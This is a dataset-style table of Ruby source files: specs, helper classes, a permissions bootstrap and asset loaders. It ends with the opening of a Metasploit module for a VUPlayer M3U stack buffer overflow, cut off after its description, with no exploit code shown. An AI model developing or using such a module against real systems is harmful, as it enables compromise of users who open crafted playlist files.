hexsha (string) | size (int64) | content (string) | avg_line_length (float64) | max_line_length (int64) | alphanum_fraction (float64)
---|---|---|---|---|---
261da42d2d3a1bb34fc097742633c1bd958bcf4e | 2,087 | require 'spec_helper'
describe SingaporeCPFCalculator::Year2015::SPR2FG::Age60To65ContributionCalculator do
subject(:calculator) {
described_class.new ordinary_wages: ordinary_wages,
additional_wages: additional_wages
}
let(:result) { calculator.calculate }
let(:additional_wages) { 0.0 }
describe "#calculate" do
context "when the total wages amounts to 0.00" do
let(:ordinary_wages) { 0.00 }
it { expect(result).to equal_cpf total: 0.00, employee: 0.00, employer: 0.00 }
end
context "when the total wages amounts to 50.00" do
let(:ordinary_wages) { 50.00 }
it { expect(result).to equal_cpf total: 0.00, employee: 0.00, employer: 0.00 }
end
context "when the total wages amounts to 50.01" do
let(:ordinary_wages) { 50.01 }
it { expect(result).to equal_cpf total: 4.00, employee: 0.00, employer: 4.00 }
end
context "when the total wages amounts to 500.00" do
let(:ordinary_wages) { 500.00 }
it { expect(result).to equal_cpf total: 43.00, employee: 0.00, employer: 43.00 }
end
context "when the total wages amounts to 500.01" do
let(:ordinary_wages) { 500.01 }
it { expect(result).to equal_cpf total: 43.00, employee: 0.00, employer: 43.00 }
end
context "when the total wages amounts to 749.99" do
let(:ordinary_wages) { 749.99 }
it { expect(result).to equal_cpf total: 120.00, employee: 56.00, employer: 64.00 }
end
context "when the total wages amounts to 750.00" do
let(:ordinary_wages) { 750.00 }
it { expect(result).to equal_cpf total: 120.00, employee: 56.00, employer: 64.00 }
end
context "when the total wages amounts to 5,000.00" do
let(:ordinary_wages) { 5_000.00 }
it { expect(result).to equal_cpf total: 800.00, employee: 375.00, employer: 425.00 }
end
context "when the total wages amounts to 10,000.00" do
let(:ordinary_wages) { 10_000.00 }
it { expect(result).to equal_cpf total: 800.00, employee: 375.00, employer: 425.00 }
end
end
end
| 32.609375 | 90 | 0.655486 |
ffaac854ede3d2c4504e8166cd56d8bf7215d711 | 587 | # DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#201. Bitwise AND of Numbers Range
#Given a range [m, n] where 0 <= m <= n <= 2147483647, return the bitwise AND of all numbers in this range, inclusive.
#For example, given the range [5, 7], you should return 4.
#Credits:
#Special thanks to @amrsaqr for adding this problem and creating all test cases.
## @param {Integer} m
## @param {Integer} n
## @return {Integer}
#def range_bitwise_and(m, n)
#end
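# Illustrative sketch of one common approach (not part of the original template):
# strip low bits from m and n until they share a common prefix, then shift back.
# def range_bitwise_and(m, n)
#   shift = 0
#   while m != n
#     m >>= 1
#     n >>= 1
#     shift += 1
#   end
#   m << shift
# end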
# Time Is Money | 34.529412 | 118 | 0.741056 |
03e1421dffc24fef60ea3e71244748ac3130859a | 489 | class TestLab
# Source Error Class
class SourceError < TestLabError; end
# Source Class
#
# @author Zachary Patten <zachary AT jovelabs DOT com>
class Source < ZTK::DSL::Base
# Associations and Attributes
belongs_to :labfile, :class_name => 'TestLab::Labfile'
def initialize(*args)
@ui = TestLab.ui
@ui.logger.info { "Loading Source '#{self.id}'" }
super(*args)
@ui.logger.info { "Source '#{self.id}' Loaded" }
end
end
end
| 20.375 | 64 | 0.625767 |
9179019cd6a67973001196fb6fc6d77fb4dba0a4 | 5,622 | # frozen_string_literal: true
require "spec_helper"
describe AuthHelper do
describe "button_based_providers" do
it 'returns all enabled providers from devise' do
allow(helper).to receive(:auth_providers) { [:twitter, :github] }
expect(helper.button_based_providers).to include(*[:twitter, :github])
end
it 'does not return ldap provider' do
allow(helper).to receive(:auth_providers) { [:twitter, :ldapmain] }
expect(helper.button_based_providers).to include(:twitter)
end
it 'returns empty array' do
allow(helper).to receive(:auth_providers) { [] }
expect(helper.button_based_providers).to eq([])
end
end
describe "providers_for_base_controller" do
it 'returns all enabled providers from devise' do
allow(helper).to receive(:auth_providers) { [:twitter, :github] }
expect(helper.providers_for_base_controller).to include(*[:twitter, :github])
end
it 'excludes ldap providers' do
allow(helper).to receive(:auth_providers) { [:twitter, :ldapmain] }
expect(helper.providers_for_base_controller).not_to include(:ldapmain)
end
end
describe "form_based_providers" do
it 'includes LDAP providers' do
allow(helper).to receive(:auth_providers) { [:twitter, :ldapmain] }
expect(helper.form_based_providers).to eq %i(ldapmain)
end
it 'includes crowd provider' do
allow(helper).to receive(:auth_providers) { [:twitter, :crowd] }
expect(helper.form_based_providers).to eq %i(crowd)
end
end
describe 'form_based_auth_provider_has_active_class?' do
it 'selects main LDAP server' do
allow(helper).to receive(:auth_providers) { [:twitter, :ldapprimary, :ldapsecondary, :kerberos] }
expect(helper.form_based_auth_provider_has_active_class?(:twitter)).to be(false)
expect(helper.form_based_auth_provider_has_active_class?(:ldapprimary)).to be(true)
expect(helper.form_based_auth_provider_has_active_class?(:ldapsecondary)).to be(false)
expect(helper.form_based_auth_provider_has_active_class?(:kerberos)).to be(false)
end
end
describe 'any_form_based_providers_enabled?' do
before do
allow(Gitlab::Auth::LDAP::Config).to receive(:enabled?).and_return(true)
end
it 'detects form-based providers' do
allow(helper).to receive(:auth_providers) { [:twitter, :ldapmain] }
expect(helper.any_form_based_providers_enabled?).to be(true)
end
it 'ignores ldap providers when ldap web sign in is disabled' do
allow(helper).to receive(:auth_providers) { [:twitter, :ldapmain] }
allow(helper).to receive(:ldap_sign_in_enabled?).and_return(false)
expect(helper.any_form_based_providers_enabled?).to be(false)
end
end
describe 'enabled_button_based_providers' do
before do
allow(helper).to receive(:auth_providers) { [:twitter, :github, :google_oauth2] }
end
context 'all providers are enabled to sign in' do
it 'returns all the enabled providers from settings' do
expect(helper.enabled_button_based_providers).to include('twitter', 'github', 'google_oauth2')
end
it 'puts google and github in the beginning' do
expect(helper.enabled_button_based_providers.first).to eq('google_oauth2')
expect(helper.enabled_button_based_providers.second).to eq('github')
end
end
context 'GitHub OAuth sign in is disabled from application setting' do
it "doesn't return github as provider" do
stub_application_setting(
disabled_oauth_sign_in_sources: ['github']
)
expect(helper.enabled_button_based_providers).to include('twitter')
expect(helper.enabled_button_based_providers).not_to include('github')
end
end
end
describe 'button_based_providers_enabled?' do
before do
allow(helper).to receive(:auth_providers) { [:twitter, :github] }
end
context 'button based providers enabled' do
it 'returns true' do
expect(helper.button_based_providers_enabled?).to be true
end
end
context 'all the button based providers are disabled via application_setting' do
it 'returns false' do
stub_application_setting(
disabled_oauth_sign_in_sources: %w(github twitter)
)
expect(helper.button_based_providers_enabled?).to be false
end
end
end
describe '#link_provider_allowed?' do
let(:policy) { instance_double('IdentityProviderPolicy') }
let(:current_user) { instance_double('User') }
let(:provider) { double }
before do
allow(helper).to receive(:current_user).and_return(current_user)
allow(IdentityProviderPolicy).to receive(:new).with(current_user, provider).and_return(policy)
end
it 'delegates to identity provider policy' do
allow(policy).to receive(:can?).with(:link).and_return('policy_link_result')
expect(helper.link_provider_allowed?(provider)).to eq 'policy_link_result'
end
end
describe '#unlink_provider_allowed?' do
let(:policy) { instance_double('IdentityProviderPolicy') }
let(:current_user) { instance_double('User') }
let(:provider) { double }
before do
allow(helper).to receive(:current_user).and_return(current_user)
allow(IdentityProviderPolicy).to receive(:new).with(current_user, provider).and_return(policy)
end
it 'delegates to identity provider policy' do
allow(policy).to receive(:can?).with(:unlink).and_return('policy_unlink_result')
expect(helper.unlink_provider_allowed?(provider)).to eq 'policy_unlink_result'
end
end
end
| 35.582278 | 103 | 0.710423 |
1d21c8772c093fda7b2a0720fdcaa4121258663a | 290 | class PathwayImage < ActiveRecord::Base
has_attached_file :background, :styles => { :thumb => "80x80>" }, :default_url => "/images/:style/missing.png"
validates_attachment_content_type :background, :content_type => /\Aimage\/.*\Z/
has_many :pathway_maps, :foreign_key => 'xref'
end
| 36.25 | 112 | 0.717241 |
611cfa35abdb22697b97b436f76db239850cfef6 | 3,107 | # encoding: utf-8
require "logstash/namespace"
require "logstash/logging"
require_relative "file_reader"
require_relative "kibana_resource"
require_relative "kibana_base_resource"
module LogStash module Modules class KibanaConfig
include LogStash::Util::Loggable
ALLOWED_DIRECTORIES = ["search", "visualization"]
attr_reader :index_name
# We name it `modul` here because `module` has meaning in Ruby.
def initialize(modul, settings)
@directory = ::File.join(modul.directory, "kibana")
@name = modul.module_name
@settings = settings
@index_name = settings.fetch("dashboards.kibana_index", ".kibana")
end
def dashboards
# there can be more than one dashboard to load
filenames = FileReader.read_json(dynamic("dashboard"))
filenames.map do |filename|
KibanaResource.new(@index_name, "dashboard", dynamic("dashboard", filename))
end
end
def index_pattern
pattern_name = "#{@name}-*"
default_index_json = "{\"defaultIndex\": \"#{pattern_name}\"}"
default_index_content_id = @settings.fetch("index_pattern.kibana_version", "5.5.0")
[
KibanaResource.new(@index_name, "index-pattern", dynamic("index-pattern"),nil, pattern_name),
KibanaResource.new(@index_name, "config", nil, default_index_json, default_index_content_id)
]
end
def resources
list = index_pattern
dashboards.each do |board|
extract_panels_into(board, list)
end
list.concat(extract_saved_searches(list))
end
private
def dynamic(dynamic_folder, filename = @name)
::File.join(@directory, dynamic_folder, "#{filename}.json")
end
def extract_panels_into(dashboard, list)
list << dashboard
dash = FileReader.read_json(dashboard.content_path)
if !dash.is_a?(Hash)
logger.warn("Kibana dashboard JSON is not an Object", :module => @name)
return
end
panelsjson = dash["panelsJSON"]
if panelsjson.nil?
logger.info("No panelJSON key found in kibana dashboard", :module => @name)
return
end
begin
panels = LogStash::Json.load(panelsjson)
rescue => e
logger.error("JSON parse error when reading kibana panelsJSON", :module => @name)
return
end
panels.each do |panel|
panel_type = panel["type"]
if ALLOWED_DIRECTORIES.member?(panel_type)
list << KibanaResource.new(@index_name, panel_type, dynamic(panel_type, panel["id"]))
else
logger.warn("panelJSON contained unknown type", :type => panel_type)
end
end
end
def extract_saved_searches(list)
result = [] # must not add to list while iterating
list.each do |resource|
next unless resource.contains?("savedSearchId")
content = resource.content_as_object
next if content.nil?
saved_search = content["savedSearchId"]
next if saved_search.nil?
ss_resource = KibanaResource.new(@index_name, "search", dynamic("search", saved_search))
next if list.member?(ss_resource) || result.member?(ss_resource)
result << ss_resource
end
result
end
end end end
| 29.590476 | 99 | 0.68748 |
1d9b749273fe79cb1d64b8160fe43994a59484f0 | 12,362 | class ArchivesSpaceService
def self.create_system_user(username, name, password, hidden = false)
if User[:username => username].nil?
User.create_from_json(JSONModel(:user).from_hash(:username => username,
:name => name),
{
:source => "local",
:is_system_user => 1
}.merge(hidden ? {:is_hidden_user => 1} : {}))
DBAuth.set_password(username, password)
return true
end
false
end
def self.create_hidden_system_user(username, name, password)
self.create_system_user(username, name, password, true)
end
def self.create_group(group_code, description, users_to_add, permissions)
global_repo = Repository[:repo_code => Repository.GLOBAL]
RequestContext.open(:repo_id => global_repo.id) do
if Group[:group_code => group_code].nil?
created_group = Group.create_from_json(JSONModel(:group).from_hash(:group_code => group_code,
:description => description),
:is_system_user => 1)
users_to_add.each do |user|
created_group.add_user(User[:username => user])
end
permissions.each do |permission|
created_group.grant(permission)
end
return true
end
end
false
end
def self.set_up_base_permissions
if not Repository[:repo_code => Repository.GLOBAL]
Repository.create(:repo_code => Repository.GLOBAL,
:name => "Global repository",
:json_schema_version => JSONModel(:repository).schema_version,
:hidden => 1)
end
AgentSoftware.ensure_correctly_versioned_archivesspace_record
# Create the admin user
self.create_system_user(User.ADMIN_USERNAME, "Administrator", AppConfig[:default_admin_password])
self.create_group(Group.ADMIN_GROUP_CODE, "Administrators", [User.ADMIN_USERNAME], [])
## Standard permissions
Permission.define("system_config",
"The ability to manage system configuration options",
:level => "global")
Permission.define("administer_system",
"The ability to act as a system administrator",
:level => "global")
Permission.define("manage_users",
"The ability to manage user accounts while logged in",
:level => "global")
Permission.define("become_user",
"The ability to masquerade as another user",
:level => "global")
Permission.define("view_all_records",
"The ability to view any record in the system",
:level => "global",
:system => true)
Permission.define("create_repository",
"The ability to create new repositories",
:level => "global")
Permission.define("delete_repository",
"The ability to delete a repository",
:level => "global")
Permission.define("transfer_repository",
"The ability to transfer the contents of a repository",
:level => "repository")
Permission.define("index_system",
"The ability to read any record for indexing",
:level => "global",
:system => true)
Permission.define("manage_repository",
"The ability to manage a given repository",
:level => "repository")
Permission.define("update_accession_record",
"The ability to create and modify accessions records",
:level => "repository")
Permission.define("update_resource_record",
"The ability to create and modify resources records",
:level => "repository")
Permission.define("update_digital_object_record",
"The ability to create and modify digital objects records",
:level => "repository")
Permission.define("update_event_record",
"The ability to create and modify event records",
:level => "repository")
Permission.define("delete_event_record",
"The ability to delete event records",
:level => "repository")
Permission.define("suppress_archival_record",
"The ability to suppress the major archival record types: accessions/resources/digital objects/components/collection management/events",
:level => "repository")
Permission.define("transfer_archival_record",
"The ability to transfer records between different repositories",
:level => "repository")
Permission.define("delete_archival_record",
"The ability to delete the major archival record types: accessions/resources/digital objects/components/collection management/events",
:level => "repository")
Permission.define("view_suppressed",
"The ability to view suppressed records in a given repository",
:level => "repository")
Permission.define("view_repository",
"The ability to view a given repository",
:level => "repository")
Permission.define("update_classification_record",
"The ability to create and modify classification records",
:level => "repository")
Permission.define("delete_classification_record",
"The ability to delete classification records",
:level => "repository")
Permission.define("mediate_edits",
"Track concurrent updates to records",
:level => "global",
:system => true)
Permission.define("import_records",
"The ability to initiate an importer job",
:level => "repository")
Permission.define("cancel_importer_job",
"The ability to cancel a queued or running importer job",
:level => "repository")
# Updates and deletes to locations, subjects and agents are a bit funny: they're
# global objects, but users are granted permission to modify them by being
# associated with a group within a repository.
Permission.define("manage_subject_record",
"The ability to create, modify and delete a subject record",
:level => "repository")
Permission.define("update_subject_record",
"The ability to create and modify subject records",
:implied_by => 'manage_subject_record',
:level => "global")
Permission.define("manage_agent_record",
"The ability to create, modify and delete an agent record",
:level => "repository")
Permission.define("update_agent_record",
"The ability to create and modify agent records",
:implied_by => 'manage_agent_record',
:level => "global")
Permission.define("manage_vocabulary_record",
"The ability to create, modify and delete a vocabulary record",
:level => "repository")
Permission.define("update_vocabulary_record",
"The ability to create and modify vocabulary records",
:implied_by => 'manage_vocabulary_record',
:level => "global")
Permission.define("update_location_record",
"The ability to create and modify location records",
:implied_by => 'manage_repository',
:level => "global")
Permission.define("delete_agent_record",
"The ability to delete agent records",
:implied_by => 'manage_agent_record',
:level => "global")
Permission.define("delete_subject_record",
"The ability to delete subject records",
:implied_by => 'manage_subject_record',
:level => "global")
Permission.define("delete_vocabulary_record",
"The ability to delete vocabulary records",
:implied_by => 'delete_archival_record',
:level => "global")
# Merge permissions are special too. A user with merge_agents_and_subjects
# in any repository is granted merge_agent_record and merge_subject_record
Permission.define("merge_agents_and_subjects",
"The ability to merge agent/subject records",
:level => "repository")
Permission.define("merge_subject_record",
"The ability to merge subject records",
:implied_by => 'merge_agents_and_subjects',
:level => "global")
Permission.define("merge_agent_record",
"The ability to merge agent records",
:implied_by => 'merge_agents_and_subjects',
:level => "global")
Permission.define("merge_archival_record",
"The ability to merge archival records records",
:level => "repository")
Permission.define("manage_rde_templates",
"The ability to create and delete RDE templates",
:level => "repository")
Permission.define("update_container_record",
"The ability to create and update container records",
:level => "repository")
Permission.define("manage_container_record",
"The ability to delete and bulk update container records",
:level => "repository")
Permission.define("manage_container_profile_record",
"The ability to create, modify and delete a container profile record",
:level => "repository")
Permission.define("update_container_profile_record",
"The ability to create/update/delete container profile records",
:implied_by => 'manage_container_profile_record',
:level => "global")
Permission.define("manage_location_profile_record",
"The ability to create, modify and delete a location profile record",
:level => "repository")
Permission.define("update_location_profile_record",
"The ability to create/update/delete location profile records",
:implied_by => 'manage_location_profile_record',
:level => "global")
end
def self.create_search_user
self.create_hidden_system_user(User.SEARCH_USERNAME, "Search Indexer", AppConfig[:search_user_secret])
DBAuth.set_password(User.SEARCH_USERNAME, AppConfig[:search_user_secret])
self.create_group(Group.SEARCHINDEX_GROUP_CODE, "Search index", [User.SEARCH_USERNAME],
["view_repository", "view_suppressed", "view_all_records", "index_system"])
end
def self.create_public_user
self.create_hidden_system_user(User.PUBLIC_USERNAME, "Public Interface Anonymous", AppConfig[:search_user_secret])
DBAuth.set_password(User.PUBLIC_USERNAME, AppConfig[:public_user_secret])
self.create_group(Group.PUBLIC_GROUP_CODE, "Public Anonymous", [User.PUBLIC_USERNAME],
["view_repository", "view_all_records"])
end
def self.create_staff_user
self.create_hidden_system_user(User.STAFF_USERNAME, "Staff System User", AppConfig[:search_user_secret])
DBAuth.set_password(User.STAFF_USERNAME, AppConfig[:staff_user_secret])
self.create_group(Group.STAFF_GROUP_CODE, "Staff System Group", [User.STAFF_USERNAME],
["mediate_edits"])
end
set_up_base_permissions
create_search_user
create_public_user
create_staff_user
end
| 40.267101 | 158 | 0.583401 |
7ad8dd2c5f521916e73bcfa738daaf740e63719b | 129 | class ActiveRecordUser < ActiveRecord::Base
include Tenacity
belongs_to :active_record_organization, :autosave => true
end | 25.8 | 59 | 0.79845 |
28f1299fea7e3fb56eddd504178068de820e0544 | 613 | module ApplicationHelper
def angular_safe_link_to(path_method, path_args = {}, *args)
link_to(
angular_path_to(
public_send("#{path_method.to_s.gsub(/(_path)?$/, '_safe_path')}", path_args)
),
*args
) do
yield
end
end
def angular_path_to(path)
"##{path}"
end
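# Unknown helper calls (e.g. the *_safe_path helpers built above) are delegated
# to Path::SafePath; when it returns nothing, the call falls through to super.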
def method_missing(method, *args)
Path::SafePath.new(self, method).call_missing(*args) || super
end
def respond_to?(method)
return true if Path::SafePath.new(self, method).does_respond_to?
super
end
def as_title(key)
key.split('_').map(&:camelize).join(' ')
end
end
| 20.433333 | 85 | 0.637847 |
1de01cdbf6adfd02e0ee9efe2c9e68930aaf2f56 | 2,464 | # Very low level interface to tidy
# This file must be lazy loaded!
class TidyFFI::LibTidy #:nodoc:
extend FFI::Library
LIB_NAME = 'tidy'.freeze
PATHS = Array([LIB_NAME] + Dir['/{opt,usr}/{,local/}lib{,64}/libtidy{,-*}.{dylib,so*}']).freeze
begin
ffi_lib(TidyFFI.library_path || PATHS)
rescue LoadError
raise TidyFFI::LibTidyNotInstalled, "didn't find tidy libs on your system. Please install tidy (http://tidy.sourceforge.net/)"
end
attach_function :tidyReleaseDate, [], :string
attach_function :tidyCreate, [], :pointer
attach_function :tidyRelease, [:pointer], :void
attach_function :tidyCleanAndRepair, [:pointer], :int
attach_function :tidyRunDiagnostics, [:pointer], :int
attach_function :tidyParseString, [:pointer, :string], :int
attach_function :tidySaveBuffer, [:pointer, :pointer], :int
attach_function :tidySetErrorBuffer, [:pointer, :pointer], :int
attach_function :tidyBufInit, [:pointer], :void
attach_function :tidyBufFree, [:pointer], :void
attach_function :tidyGetOptionByName, [:pointer, :string], :pointer
attach_function :tidyOptGetId, [:pointer], :int
attach_function :tidyOptSetValue, [:pointer, :int, :string], :int
# iterators
attach_function :tidyGetOptionList, [:pointer], :pointer
attach_function :tidyGetNextOption, [:pointer, :pointer], :pointer
attach_function :tidyOptGetName, [:pointer], :string
attach_function :tidyOptGetType, [:pointer], :int
attach_function :tidyOptGetDefault, [:pointer], :string
attach_function :tidyOptGetDefaultInt, [:pointer], :ulong
attach_function :tidyOptGetDefaultBool, [:pointer], :int
attach_function :tidyOptIsReadOnly, [:pointer], :int
attach_function :tidyOptGetPickList, [:pointer], :pointer
attach_function :tidyOptGetNextPick, [:pointer, :pointer], :string
#types
# /** Option data types
# */
# typedef enum
# {
# TidyString, /**< String */
# TidyInteger, /**< Integer or enumeration */
# TidyBoolean /**< Boolean flag */
# } TidyOptionType;
TIDY_OPTION_TYPE = [:string, :integer, :boolean].freeze
end
class TidyFFI::LibTidy::TidyBuf < FFI::Struct #:nodoc:
layout :bp, :string,
:size, :uint,
:allocated, :uint,
:next, :uint
end
class TidyFFI::LibTidy::TidyBufWithAllocator < FFI::Struct #:nodoc:
layout :allocator, :pointer,
:bp, :string,
:size, :uint,
:allocated, :uint,
:next, :uint
end
| 32 | 130 | 0.687906 |
aba2a61d03c06f61e6b96af1a321b66ff3ce1524 | 4,878 | # frozen_string_literal: true
require 'stronger_parameters/constraints'
module StrongerParameters
module ControllerSupport
module PermittedParameters
def self.included(klass)
klass.extend ClassMethods
klass.public_send :before_action, :permit_parameters
end
def self.sugar(value)
case value
when Array
ActionController::Parameters.array(*value.map { |v| sugar(v) })
when Hash
constraints = value.transform_values do |v|
sugar(v)
end
ActionController::Parameters.map(constraints)
else
value
end
end
DEFAULT_PERMITTED = {
controller: ActionController::Parameters.anything,
action: ActionController::Parameters.anything,
format: ActionController::Parameters.anything,
authenticity_token: ActionController::Parameters.string,
utf8: Parameters.string,
_method: Parameters.string,
commit: Parameters.string
}.freeze
module ClassMethods
def self.extended(base)
base.send :class_attribute, :log_unpermitted_parameters, instance_accessor: false
end
def log_invalid_parameters!
self.log_unpermitted_parameters = true
end
def permitted_parameters(action, permitted)
if permit_parameters[action] == :skip || permitted == :skip
permit_parameters[action] = permitted
else
action_permitted = (permit_parameters[action] ||= {})
action_permitted.deep_merge!(permitted)
end
end
def permitted_parameters_for(action)
unless for_action = permit_parameters[action]
# NOTE: there is no easy way to test this, so make sure to test with
# a real rails controller if you make changes.
message = "Action #{action} for #{self} does not have any permitted parameters"
message += " (#{instance_method(action).source_location.join(":")})" if method_defined?(action)
raise(KeyError, message)
end
return :skip if for_action == :skip
# FYI: we should be able to call sugar on the result of deep_merge, but it breaks tests
permit_parameters[:all].deep_merge(for_action).
transform_values { |v| PermittedParameters.sugar(v) }
end
private
def permit_parameters
@permit_parameters ||= if superclass.respond_to?(:permit_parameters, true)
superclass.send(:permit_parameters).deep_dup
else
{all: DEFAULT_PERMITTED.deep_dup}
end
end
end
private
def permit_parameters
action = params.fetch(:action).to_sym
permitted = self.class.permitted_parameters_for(action)
return if permitted == :skip
# TODO: invalid values should also be logged, but atm only invalid keys are
log_unpermitted = self.class.log_unpermitted_parameters
permitted_params = without_invalid_parameter_exceptions(log_unpermitted) { params.permit(permitted) }
unpermitted_keys = flat_keys(params) - flat_keys(permitted_params)
show_unpermitted_keys(unpermitted_keys, log_unpermitted)
return if log_unpermitted
params.send(:parameters).replace(permitted_params)
params.permit!
request.params.replace(permitted_params)
logged_params = request.send(:parameter_filter).filter(permitted_params) # Removing passwords, etc
Rails.logger.info(" Filtered Parameters: #{logged_params.inspect}")
end
def show_unpermitted_keys(unpermitted_keys, log_unpermitted)
return if unpermitted_keys.empty?
log_prefix = (log_unpermitted ? 'Found' : 'Removed')
message =
"#{log_prefix} restricted keys #{unpermitted_keys.inspect} from parameters according to permitted list"
if Rails.configuration.respond_to?(:stronger_parameters_violation_header)
header = Rails.configuration.stronger_parameters_violation_header
end
response.headers[header] = message if response && header
Rails.logger.info(" #{message}")
end
def without_invalid_parameter_exceptions(log)
if log
begin
old = ActionController::Parameters.action_on_invalid_parameters
ActionController::Parameters.action_on_invalid_parameters = :log
yield
ensure
ActionController::Parameters.action_on_invalid_parameters = old
end
else
yield
end
end
def flat_keys(hash)
hash = hash.send(:parameters) if hash.is_a?(ActionController::Parameters)
hash.flat_map { |k, v| v.is_a?(Hash) ? flat_keys(v).map { |x| "#{k}.#{x}" }.push(k) : k }
end
end
end
end
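# Illustrative usage sketch (assumed, not part of this file): a controller that
# includes this module declares its permitted parameters per action, e.g.
#
#   class UsersController < ApplicationController
#     permitted_parameters :create, user: { name: ActionController::Parameters.string,
#                                           age: ActionController::Parameters.integer }
#     permitted_parameters :index, :skip
#   end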
| 34.595745 | 113 | 0.650882 |
872ba4cd4003249e8ce8507307e27b97084d6c1a | 2,376 | module Ckeditor
module Rails
class Asset
attr_reader :name, :root
def initialize name = 'ckeditor', path = '../vendor/assets'
@name = name
@root = Ckeditor::Rails.root_path.join path
end
def image_files
path = root.join('images', name)
files = Dir.glob(path.join('plugins', '**', '*.{png,gif,jpg,svg}')).reject { |file|
invalid_plugin_file?(file)
}
files += Dir.glob(path.join('skins', '**', '*.{png,gif,jpg,svg}')).reject { |file|
invalid_skin_file?(file)
}
files
end
def javascript_files
path = root.join('javascripts', name)
files = Dir.glob(path.join('*.js'))
files += Dir.glob(path.join('lang', '*.js')).reject { |file|
invalid_lang_file?(file)
}
files += Dir.glob(path.join('plugins', '**', '*.{js,html}')).reject { |file|
invalid_plugin_file?(file) or invalid_lang_file?(file)
}
files
end
def stylesheet_files
path = root.join('stylesheets', name)
files = Dir.glob(path.join('*.css'))
files += Dir.glob(path.join('plugins', '**', '*.css')).reject { |file|
invalid_plugin_file?(file)
}
files += Dir.glob(path.join('skins', '**', '*.css')).reject { |file|
invalid_skin_file?(file)
}
files
end
def files
files = []
files += image_files
files += javascript_files
files += stylesheet_files
files
end
private
def languages
Ckeditor::Rails.assets_languages
end
def plugins
Ckeditor::Rails.assets_plugins
end
def skins
Ckeditor::Rails.assets_skins
end
def invalid_lang_file? file
return false if languages.nil?
return false unless file.include? '/lang/'
not languages.include? File.basename(file, '.*')
end
def invalid_plugin_file? file
return false if plugins.nil?
return false unless file.include? '/plugins/'
plugins.none? { |plugin| file.include? "/#{plugin}/" }
end
def invalid_skin_file? file
return false if skins.nil?
return false unless file.include? '/skins/'
skins.none? { |skin| file.include? "/#{skin}/" }
end
end
end
end
| 26.4 | 91 | 0.550926 |
91b9759b99684e2464bb1405243fbdea31748c55 | 729 | $:.push File.expand_path("../lib", __FILE__)
# Maintain your gem's version:
require "braavos/version"
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = "braavos"
s.version = Braavos::VERSION
s.authors = ["Fabiano Beselga"]
s.email = ["[email protected]"]
s.homepage = "TODO"
s.summary = "TODO: Summary of Braavos."
s.description = "TODO: Description of Braavos."
s.license = "MIT"
s.files = Dir["{app,config,db,lib}/**/*", "MIT-LICENSE", "Rakefile", "README.rdoc"]
s.test_files = Dir["spec/**/*"]
s.add_dependency "rails", "~> 4.2.3"
s.add_development_dependency "sqlite3"
s.add_development_dependency "rspec-rails"
end
| 29.16 | 85 | 0.650206 |
1844ac969e6285377f9bdbc4f218cd041b025298 | 4,920 | module RI
class ClassEntry
attr_reader :name
attr_reader :path_names
def initialize(path_name, name, in_class)
@path_names = [ path_name ]
@name = name
@in_class = in_class
@class_methods = []
@instance_methods = []
@inferior_classes = []
end
# We found this class in more than one place, so add
# in the name from there.
def add_path(path)
@path_names << path
end
# read in our methods and any classes
# and modules in our namespace. Methods are
# stored in files called name-c|i.yaml,
# where the 'name' portion is the external
# form of the method name and the c|i is a class|instance
# flag
def load_from(dir)
Dir.foreach(dir) do |name|
next if name =~ /^\./
# convert from external to internal form, and
# extract the instance/class flag
if name =~ /^(.*?)-(c|i).yaml$/
external_name = $1
is_class_method = $2 == "c"
internal_name = RiWriter.external_to_internal(external_name)
list = is_class_method ? @class_methods : @instance_methods
path = File.join(dir, name)
list << MethodEntry.new(path, internal_name, is_class_method, self)
else
full_name = File.join(dir, name)
if File.directory?(full_name)
inf_class = @inferior_classes.find {|c| c.name == name }
if inf_class
inf_class.add_path(full_name)
else
inf_class = ClassEntry.new(full_name, name, self)
@inferior_classes << inf_class
end
inf_class.load_from(full_name)
end
end
end
end
# Return a list of any classes or modules that we contain
# that match a given string
def contained_modules_matching(name)
@inferior_classes.find_all {|c| c.name[name]}
end
def classes_and_modules
@inferior_classes
end
# Return an exact match to a particular name
def contained_class_named(name)
@inferior_classes.find {|c| c.name == name}
end
# return the list of local methods matching name
# We're split into two because we need distinct behavior
# when called from the _toplevel_
def methods_matching(name, is_class_method)
local_methods_matching(name, is_class_method)
end
# Find methods matching 'name' in ourselves and in
# any classes we contain
def recursively_find_methods_matching(name, is_class_method)
res = local_methods_matching(name, is_class_method)
@inferior_classes.each do |c|
res.concat(c.recursively_find_methods_matching(name, is_class_method))
end
res
end
# Return our full name
def full_name
res = @in_class.full_name
res << "::" unless res.empty?
res << @name
end
# Return a list of all our method names
def all_method_names
res = @class_methods.map {|m| m.full_name }
@instance_methods.each {|m| res << m.full_name}
res
end
private
# Return a list of all our methods matching a given string.
# Is +is_class_methods+ if 'nil', we don't care if the method
# is a class method or not, otherwise we only return
# those methods that match
def local_methods_matching(name, is_class_method)
list = case is_class_method
when nil then @class_methods + @instance_methods
when true then @class_methods
when false then @instance_methods
else fail "Unknown is_class_method: #{is_class_method.inspect}"
end
list.find_all {|m| m.name[name]}
end
end
# A TopLevelEntry is like a class entry, but when asked to search
# for methods searches all classes, not just itself
class TopLevelEntry < ClassEntry
def methods_matching(name, is_class_method)
res = recursively_find_methods_matching(name, is_class_method)
end
def full_name
""
end
def module_named(name)
end
end
class MethodEntry
attr_reader :name
attr_reader :path_name
def initialize(path_name, name, is_class_method, in_class)
@path_name = path_name
@name = name
@is_class_method = is_class_method
@in_class = in_class
end
def full_name
res = @in_class.full_name
unless res.empty?
if @is_class_method
res << "::"
else
res << "#"
end
end
res << @name
end
end
# We represent everything known about all 'ri' files
# accessible to this program
class RiCache
attr_reader :toplevel
def initialize(dirs)
# At the top level we have a dummy module holding the
# overall namespace
@toplevel = TopLevelEntry.new('', '::', nil)
dirs.each do |dir|
@toplevel.load_from(dir)
end
end
end
end
| 26.170213 | 78 | 0.627642 |
1afde0f7b0de2ebac26b097231950341b99286ac | 2,764 | ##
# $Id: vuplayer_m3u.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'VUPlayer M3U Buffer Overflow',
'Description' => %q{
This module exploits a stack over flow in VUPlayer <= 2.49. When
the application is used to open a specially crafted m3u file, an buffer is overwritten allowing
for the execution of arbitrary code.
},
